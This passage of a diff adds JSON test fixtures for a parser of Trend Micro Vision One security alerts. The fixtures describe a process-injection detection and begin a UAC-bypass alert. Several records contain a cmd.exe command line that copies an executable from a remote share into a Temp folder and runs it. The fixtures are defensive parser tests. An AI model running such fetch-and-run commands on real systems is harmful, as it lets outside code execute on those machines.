\"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": 
[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": 
\"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], 
\"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": 
\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 
4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": 
[\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Process Injection from Windows Temporary Location to System32",
+ "type": [
+ "info"
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
+ },
+ "@timestamp": "2024-07-23T07:49:48Z",
+ "host": {
+ "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299",
+ "ip": [
+ "19.112.87.74"
+ ],
+ "name": "CHTX-XMEDICA-2K12.windows10.local"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "SesProbe-31944.exe ",
+ "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe",
+ "hash": {
+ "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303"
+ },
+ "parent": {
+ "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S",
+ "executable": "C:\\Windows\\System32\\cmd.exe",
+ "hash": {
+ "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ }
+ },
+ "pid": 5552
+ },
+ "related": {
+ "hash": [
+ "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303",
+ "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ ],
+ "ip": [
+ "19.112.87.74"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Process Injection from Windows Temporary Location to System32"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "incident_id": "IC-14558-20240722-00000",
+ "investigation_status": "New",
+ "severity": "medium",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
new file mode 100644
index 000000000..6598afe24
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": 